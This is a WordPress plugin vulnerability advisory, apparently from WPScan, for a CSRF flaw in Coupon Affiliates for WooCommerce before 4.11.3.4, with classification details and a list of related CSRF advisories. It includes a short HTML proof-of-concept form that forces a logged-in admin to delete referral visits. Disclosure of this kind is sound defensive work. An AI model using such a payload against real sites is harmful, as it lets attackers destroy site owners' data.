WordPress Plugin Vulnerabilities

Coupon Affiliates for WooCommerce < 4.11.3.4 - Arbitrary Referral Visits Deletion via CSRF

Description

The plugin does not have any CSRF in place when deleting Referral Visits, which could allow attackers to make a logged in admin delete them via a CSRF attack

Proof of Concept

<html>
  <body>
    <form action="httsp://example.com/wp-admin/admin.php?page=wcusage_clicks" method="POST">
      <input type="hidden" name="wcu-status-delete" value="a" />
      <input type="hidden" name="wcu-id" value="42" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

Plugin icon
woo-coupon-usage
Fixed in 4.11.3.4

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352
CVSS
4.3 (medium)

Miscellaneous

Original Researcher
WPScanTeam
Verified
Yes
WPVDB ID
d592b286-ae8d-445a-b674-b5eaaa0a6b72

Timeline

Publicly Published
2021-10-11 (about 2 years ago)
Added
2021-10-11 (about 2 years ago)
Last Updated
2021-10-11 (about 2 years ago)

Other

Published
Title
Published
2024-04-22
Title
WP ADA Compliance Check Basic – Most Comprehensive Web Accessibility Solution for WordPress < 3.1.4 - Cross-Site Request Forgery
Published
2023-03-03
Title
About Me 3000 widget <= 2.2.6 - CSRF
Published
2024-03-28
Title
Events Manager < 6.4.7.2 - Cross-Site Request Forgery
Published
2018-12-18
Title
Two Factor Authentication <= 1.3.12 - Disable Two Factor Authentication CSRF
Published
2024-02-22
Title
Digits < 8.4.2 - Cross-Site Request Forgery to Privilege Escalation